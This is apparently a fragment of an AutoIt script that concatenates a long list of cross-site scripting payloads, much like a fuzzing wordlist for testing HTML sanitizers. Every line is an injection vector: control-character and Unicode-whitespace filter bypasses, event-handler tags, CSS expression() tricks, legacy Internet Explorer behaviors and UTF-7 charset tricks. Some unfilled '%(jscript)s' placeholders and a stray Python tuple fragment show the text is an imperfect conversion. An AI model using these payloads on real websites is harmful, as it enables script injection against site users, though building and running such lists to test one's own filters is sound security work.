"ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\x09expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\x20expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\x00expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF" & @CRLF & _
"ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF" & @CRLF & _
"<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>" & @CRLF & _
"`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x \x22onerror=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x \x09onerror=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x \x00onerror=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x \x27onerror=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x \x20onerror=javascript:alert(1)>" & @CRLF & _
""`'><script>\x3Bjavascript:alert(1)</script>" & @CRLF & _
""`'><script>\x0Djavascript:alert(1)</script>" & @CRLF & _
""`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x81javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x84javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE3\x80\x80javascript:alert(1)</script>" & @CRLF & _
""`'><script>\x09javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x89javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x85javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x88javascript:alert(1)</script>" & @CRLF & _
""`'><script>\x00javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\xA8javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE1\x9A\x80javascript:alert(1)</script>" & @CRLF & _
""`'><script>\x0Cjavascript:alert(1)</script>" & @CRLF & _
""`'><script>\x2Bjavascript:alert(1)</script>" & @CRLF & _
""`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>" & @CRLF & _
""`'><script>-javascript:alert(1)</script>" & @CRLF & _
""`'><script>\x0Ajavascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\xAFjavascript:alert(1)</script>" & @CRLF & _
""`'><script>\x7Ejavascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x87javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\xA9javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xC2\x85javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x83javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>" & @CRLF & _
""`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x80javascript:alert(1)</script>" & @CRLF & _
""`'><script>\x21javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x82javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE2\x80\x86javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>" & @CRLF & _
""`'><script>\x0Bjavascript:alert(1)</script>" & @CRLF & _
""`'><script>\x20javascript:alert(1)</script>" & @CRLF & _
""`'><script>\xC2\xA0javascript:alert(1)</script>" & @CRLF & _
""/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />" & @CRLF & _
""/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />" & @CRLF & _
""/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />" & @CRLF & _
""/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />" & @CRLF & _
""/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />" & @CRLF & _
""/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />" & @CRLF & _
""/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />" & @CRLF & _
""/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />" & @CRLF & _
""/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />" & @CRLF & _
"<script\x2F>javascript:alert(1)</script>" & @CRLF & _
"<script\x20>javascript:alert(1)</script>" & @CRLF & _
"<script\x0D>javascript:alert(1)</script>" & @CRLF & _
"<script\x0A>javascript:alert(1)</script>" & @CRLF & _
"<script\x0C>javascript:alert(1)</script>" & @CRLF & _
"<script\x00>javascript:alert(1)</script>" & @CRLF & _
"<script\x09>javascript:alert(1)</script>" & @CRLF & _
""><img src=x onerror=javascript:alert(1)>" & @CRLF & _
""><img src=x onerror=javascript:alert('1')>" & @CRLF & _
""><img src=x onerror=javascript:alert("1")>" & @CRLF & _
""><img src=x onerror=javascript:alert(`1`)>" & @CRLF & _
""><img src=x onerror=javascript:alert(('1'))>" & @CRLF & _
""><img src=x onerror=javascript:alert(("1"))>" & @CRLF & _
""><img src=x onerror=javascript:alert((`1`))>" & @CRLF & _
""><img src=x onerror=javascript:alert(A)>" & @CRLF & _
""><img src=x onerror=javascript:alert((A))>" & @CRLF & _
""><img src=x onerror=javascript:alert(('A'))>" & @CRLF & _
""><img src=x onerror=javascript:alert('A')>" & @CRLF & _
""><img src=x onerror=javascript:alert(("A"))>" & @CRLF & _
""><img src=x onerror=javascript:alert("A")>" & @CRLF & _
""><img src=x onerror=javascript:alert((`A`))>" & @CRLF & _
""><img src=x onerror=javascript:alert(`A`)>" & @CRLF & _
"`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x onerror\x00=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x onerror\x20=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>" & @CRLF & _
"`"'><img src=xxx:x onerror\x09=javascript:alert(1)>" & @CRLF & _
"<script>javascript:alert(1)<\x00/script>" & @CRLF & _
"<img src=# onerror\x3D"javascript:alert(1)" >" & @CRLF & _
"<input onfocus=javascript:alert(1) autofocus>" & @CRLF & _
"<>" & @CRLF & _
"<input onblur=javascript:alert(1) autofocus><input autofocus>" & @CRLF & _
"<video poster=javascript:javascript:alert(1)//" & @CRLF & _
"<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>" & @CRLF & _
"<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X" & @CRLF & _
"<video><source onerror="javascript:javascript:alert(1)">" & @CRLF & _
"<video onerror="javascript:javascript:alert(1)"><source>" & @CRLF & _
"<form><button formaction="javascript:javascript:alert(1)">X" & @CRLF & _
"<body oninput=javascript:alert(1)><input autofocus>" & @CRLF & _
"<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>" & @CRLF & _
"<frameset onload=javascript:alert(1)>" & @CRLF & _
"<table background="javascript:javascript:alert(1)">" & @CRLF & _
"<!--<img src="--><img src=x onerror=javascript:alert(1)//">" & @CRLF & _
"<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">" & @CRLF & _
"<![><img src="]><img src=x onerror=javascript:alert(1)//">" & @CRLF & _
"<style><img src="</style><img src=x onerror=javascript:alert(1)//">" & @CRLF & _
"<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>" & @CRLF & _
"<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>" & @CRLF & _
"<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>" & @CRLF & _
"<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>" & @CRLF & _
"<object data="data:text/html;base64,%(base64)s">" & @CRLF & _
"<embed src="data:text/html;base64,%(base64)s">" & @CRLF & _
"<b <script>alert(1)</script>0" & @CRLF & _
"<div id="div1"><input value="``onmouseover=javascript:alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>" & @CRLF & _
"<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>" & @CRLF & _
"<embed src="javascript:alert(1)">" & @CRLF & _
"<img src="javascript:alert(1)">" & @CRLF & _
"<image src="javascript:alert(1)">" & @CRLF & _
"<script src="javascript:alert(1)">" & @CRLF & _
"<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x" & @CRLF & _
"<? foo="><script>javascript:alert(1)</script>">" & @CRLF & _
"<! foo="><script>javascript:alert(1)</script>">" & @CRLF & _
"</ foo="><script>javascript:alert(1)</script>">" & @CRLF & _
"<? foo="><x foo='?><script>javascript:alert(1)</script>'>">" & @CRLF & _
"<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">" & @CRLF & _
"<% foo><x foo="%><script>javascript:alert(1)</script>">" & @CRLF & _
"<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>" & @CRLF & _
"<img \x00src=x onerror="alert(1)">" & @CRLF & _
"<img \x47src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img \x11src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img \x12src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img\x47src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img\x10src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img\x13src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img\x32src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img\x47src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img\x11src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img \x47src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img \x34src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img \x39src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img \x00src=x onerror="javascript:alert(1)">" & @CRLF & _
"<img src\x09=x onerror="javascript:alert(1)">" & @CRLF & _
"<img src\x10=x onerror="javascript:alert(1)">" & @CRLF & _
"<img src\x13=x onerror="javascript:alert(1)">" & @CRLF & _
"<img src\x32=x onerror="javascript:alert(1)">" & @CRLF & _
"<img src\x12=x onerror="javascript:alert(1)">" & @CRLF & _
"<img src\x11=x onerror="javascript:alert(1)">" & @CRLF & _
"<img src\x00=x onerror="javascript:alert(1)">" & @CRLF & _
"<img src\x47=x onerror="javascript:alert(1)">" & @CRLF & _
"<img src=x\x09onerror="javascript:alert(1)">" & @CRLF & _
"<img src=x\x10onerror="javascript:alert(1)">" & @CRLF & _
"<img src=x\x11onerror="javascript:alert(1)">" & @CRLF & _
"<img src=x\x12onerror="javascript:alert(1)">" & @CRLF & _
"<img src=x\x13onerror="javascript:alert(1)">" & @CRLF & _
"<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">" & @CRLF & _
"<img src=x onerror=\x09"javascript:alert(1)">" & @CRLF & _
"<img src=x onerror=\x10"javascript:alert(1)">" & @CRLF & _
"<img src=x onerror=\x11"javascript:alert(1)">" & @CRLF & _
"<img src=x onerror=\x12"javascript:alert(1)">" & @CRLF & _
"<img src=x onerror=\x32"javascript:alert(1)">" & @CRLF & _
"<img src=x onerror=\x00"javascript:alert(1)">" & @CRLF & _
"<a href=javascript:javascript:alert(1)>XXX</a>" & @CRLF & _
"<img src="x` `<script>javascript:alert(1)</script>"` `>" & @CRLF & _
"<img src onerror /" '"= alt=javascript:alert(1)//">" & @CRLF & _
"<title onpropertychange=javascript:alert(1)></title><title title=>" & @CRLF & _
"<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">" & @CRLF & _
"<!--[if]><script>javascript:alert(1)</script -->" & @CRLF & _
"<!--[if<img src=x onerror=javascript:alert(1)//]> -->" & @CRLF & _
"<script src="/\%(jscript)s"></script>" & @CRLF & _
"<script src="\\%(jscript)s"></script>" & @CRLF & _
"<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>" & @CRLF & _
"<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X" & @CRLF & _
"<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};</style>" & @CRLF & _
"<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d" & @CRLF & _
"<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>" & @CRLF & _
"<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>" & @CRLF & _
"<style>*[{}@import'%(css)s?]</style>X" & @CRLF & _
"<div style="font-family:'foo ;color:red;';">XXX" & @CRLF & _
"<div style="font-family:foo}color=red;">XXX" & @CRLF & _
"<// style=x:expression\28javascript:alert(1)\29>" & @CRLF & _
"<style>*{x:expression(javascript:alert(1))}</style>" & @CRLF & _
"<div style=content:url(%(svg)s)></div>" & @CRLF & _
"<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X" & @CRLF & _
"<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>" & @CRLF & _
"<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X" & @CRLF & _
"<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X" & @CRLF & _
"<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>" & @CRLF & _
"<x style="background:url('x;color:red;/*')">XXX</x>" & @CRLF & _
"<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>" & @CRLF & _
"<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>" & @CRLF & _
"<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>" & @CRLF & _
"<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>" & @CRLF & _
"<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi" & @CRLF & _
"<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>" & @CRLF & _
"<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾" & @CRLF & _
"X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >" & @CRLF & _
"1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>" & @CRLF & _
"1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>" & @CRLF & _
"<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>" & @CRLF & _
"1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>" & @CRLF & _
"<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>" & @CRLF & _
"<x style="behavior:url(%(sct)s)">" & @CRLF & _
"<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>" & @CRLF & _
"<event-source src="%(event)s" onload="javascript:alert(1)">" & @CRLF & _
"<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">" & @CRLF & _
"<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">" & @CRLF & _
"<script>%(payload)s</script>" & @CRLF & _
"<script src=%(jscript)s></script>" & @CRLF & _
"<script language='javascript' src='%(jscript)s'></script>" & @CRLF & _
"<script>javascript:alert(1)</script>" & @CRLF & _
"<IMG SRC="javascript:javascript:alert(1);">" & @CRLF & _
"<IMG SRC=javascript:javascript:alert(1)>" & @CRLF & _
"<IMG SRC=`javascript:javascript:alert(1)`>" & @CRLF & _
"<SCRIPT SRC=%(jscript)s?<B>" & @CRLF & _
"<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>" & @CRLF & _
"<BODY ONLOAD=javascript:alert(1)>" & @CRLF & _
"<BODY ONLOAD=javascript:javascript:alert(1)>" & @CRLF & _
"<IMG SRC="jav ascript:javascript:alert(1);">" & @CRLF & _
"<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>" & @CRLF & _
"<SCRIPT/SRC="%(jscript)s"></SCRIPT>" & @CRLF & _
"<<SCRIPT>%(payload)s//<</SCRIPT>" & @CRLF & _
"<IMG SRC="javascript:javascript:alert(1)"" & @CRLF & _
"<iframe src=%(scriptlet)s <" & @CRLF & _
"<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">" & @CRLF & _
"<IMG DYNSRC="javascript:javascript:alert(1)">" & @CRLF & _
"<IMG LOWSRC="javascript:javascript:alert(1)">" & @CRLF & _
"<BGSOUND SRC="javascript:javascript:alert(1);">" & @CRLF & _
"<BR SIZE="&{javascript:alert(1)}">" & @CRLF & _
"<LAYER SRC="%(scriptlet)s"></LAYER>" & @CRLF & _
"<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">" & @CRLF & _
"<STYLE>@import'%(css)s';</STYLE>" & @CRLF & _
"<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">" & @CRLF & _
"<XSS STYLE="behavior: url(%(htc)s);">" & @CRLF & _
"<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS" & @CRLF & _
"<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">" & @CRLF & _
"<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">" & @CRLF & _
"<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>" & @CRLF & _
"<TABLE BACKGROUND="javascript:javascript:alert(1)">" & @CRLF & _
"<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">" & @CRLF & _
"<DIV STYLE="background-image: url(javascript:javascript:alert(1))">" & @CRLF & _
"<DIV STYLE="width:expression(javascript:alert(1));">" & @CRLF & _
"<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">" & @CRLF & _
"<XSS STYLE="xss:expression(javascript:alert(1))">" & @CRLF & _
"<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>" & @CRLF & _
"<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>" & @CRLF & _
"<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>" & @CRLF & _
"<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->" & @CRLF & _
"<BASE HREF="javascript:javascript:alert(1);//">" & @CRLF & _
"<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>" & @CRLF & _
"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>" & @CRLF & _
"<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>" & @CRLF & _
"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>" & @CRLF & _
"<SCRIPT SRC="%(jpg)s"></SCRIPT>" & @CRLF & _
"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-" & @CRLF & _
"<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X" & @CRLF & _
"<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>" & @CRLF & _
"<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">" & @CRLF & _
"<STYLE>@import'%(css)s';</STYLE>" & @CRLF & _
"<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>" & @CRLF & _
"<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>" & @CRLF & _
"<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>" & @CRLF & _
"<style onreadystatechange=javascript:javascript:alert(1);></style>" & @CRLF & _
"<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>" & @CRLF & _
